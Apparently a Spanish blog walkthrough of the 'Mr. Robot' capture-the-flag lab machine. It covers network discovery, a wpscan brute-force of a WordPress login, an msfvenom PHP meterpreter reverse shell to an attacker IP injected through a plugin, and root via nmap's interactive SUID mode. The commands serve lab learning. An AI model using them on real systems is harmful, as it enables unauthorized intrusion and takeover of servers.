Sitio web de la máquina

logo mr robot

Este reto está basado en la serie de televisión mr. robot, es una máquina Linux con kernel 3.13.0-55-generic #94-Ubuntu SMP.

Lo primero que haremos sera lanzar un proceso de descubrimiento de las máquinas conectadas a la red, para ello usaremos netdiscover:

1

Ya sabemos que solo hay 3 máquinas conectadas en la red LAN, por lo cúal el escaneo profundo de Nmap será rápido. Lanzamiento de Nmap.

2.PNG

Tras provar servicios de diferentes máquinas encontramos esta máquina extraña, al intentar conectarnos al puerto ssh confirmamos que está cerrado, pero el puerto 80 aloja un servidor web del cúal hay acceso real.

 

Como se observa la página a la que se tiene acceso es solo un burdo Honeypot del cual no se puede sacar ningún tipo de información, debido a esto y por costrumbre examinaré el archivo robots.txt.

3

Hay 2 archivos interesantes… La 1º clave, y un diccionario.

La clave contiene esto:

key-1-of-3.txt : 073403c8a58a1f80d943455fb30724b9

Esta clave no tiene descrifrado a texto plano en los muchos decodificadores que he probado. Sigamos…

El archivo fsociety.dic procedo a desacargarlo y determino lanzar Nikto para un fuzzeo del contenedor web.

nikto -host 192.168.1.20

4

5

Claramente estamos delante un CMS de WordPress que por lo tanto tiene un panel de login al que procedo a acceder por el navegador:  192.168.1.20/wp-login.php

Tras intentar con ‘admin’ y ‘administrator’ decido empezar con personajes de la serie y al segundo obtengo buenas respuestas.

6

Ahora estamos delante un panel de acceso sobre el cual tenemos un usuario, un diccionario y una herramienta que puede realizar el ataque por nosotros en tansolo unas pocas palabras, wpscan. Wpscan permite muchas acciones sobre ese tipo de CMS’s como búsqueda de vulnerabilidades en los plugguins, inyección de contraseñas y mucho más, sin embargo en esta ocasión vamos a centrarnos en la fuerza bruta sobre el usuario elliot junto a fsociety.dic.

wpscan –url 192.168.1.20  –wordlist /root/Escritorio/fsociety.dic –username elliot

El scaneo real tardo 11 horas, este añadí la clave al principio del documento…

7

Ya tengo la posibiliad de entrar en el panel de administración de CMS WordPress

8

En este punto existe la necesidad de ejecutar una shell para poder acceder a los path del servidor. Para ello existe un pluggin en wordpress llamado INSERT PHP el cual voy a añadir para abrir un meterpreter.

9

Una vez está el plugin instalado procedo a codificar una shell meterpreter con msfvenom para php

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.51 lport=8888 > /root/Escritorio/shell.php

10

El archivo shell.php queda de esta manera.

11

Procedo a copiar toda la shell para generar un post e inyectarla.

Genero el post con las directrices del plugin INSERT PHP.

12

Ahora procedo a configurar la shell reversa en meterpreter.

13

Cuando la conexión reversa está a la escucha procedo a abrir el enlace del post que hemos creado

14

Mientras tanto en el meterpreter…

15

Ahora lo primero es ver que contienen los directorios. Los referentes al contenedor web no albergan ningun fichero relevante, de manera que accedo al path home.

16

Claramente existe un directorio de un usuario o grupo llamado robot.

17

18

Tal y como se observa tenemos un archivo llamado password.raw.md5 que podemos leer mientras que el archivo llamado key-2-of-3.txt no podemos leerla, probaremos a ver quien es el usuario propietario de key-2-of-3.txt.

Con este sitio web crackeamos la password md5 https://hashkiller.co.uk/md5-decrypter.aspx

robot password == abcdefghijklmnopqrstuvwxyz

Cuando intento logearme el sistema me indica que no hay tty para poder lanzar comandos como sudo, de manera que desde la shell voy a lanzar uno con python.

python -c ‘import pty; pty.spawn(“/bin/bash”)’, despues, su robot.

19

Tengo que confesar que la parte del reto que viene ahora la tuve que investigar dado que mi intención era compilar un rootkit de exploitdb para este kernel pero no obtuve una respuesta correcta en la ejecución de los dos que probé, (fueron subidos a wp-content).

El resto de solucionarios que he visto de esta máquina usan la misma técnica y yo os la voy a explicar. Hay una posibilidad dentro de los usuarios y grupos de sistemas linux de tener los mismos permisos que root en determinadas aplicaciones o ficheros, claro está que esto no será igual en el resto del sistema, entonces en este caso nmap otorga este servicio por defecto al usuario que lo instaló. No sería nada importante salvo por el hecho de que Nmap posé un modo interactivo, un CLI.

Este cli permite ejecutar comandos de /bin/sh y si por delante del comando utilizamos el simbolo de apertura de exclamación, activará el bit suid extrapolandolo a todo el sistema, de manera que podremos acceder a root que es donde se almacena la pista más dura.

21Con esto se termina la máquina de mr robot y puedo irme a tomar un café_helado…o caliente ;).

Anuncios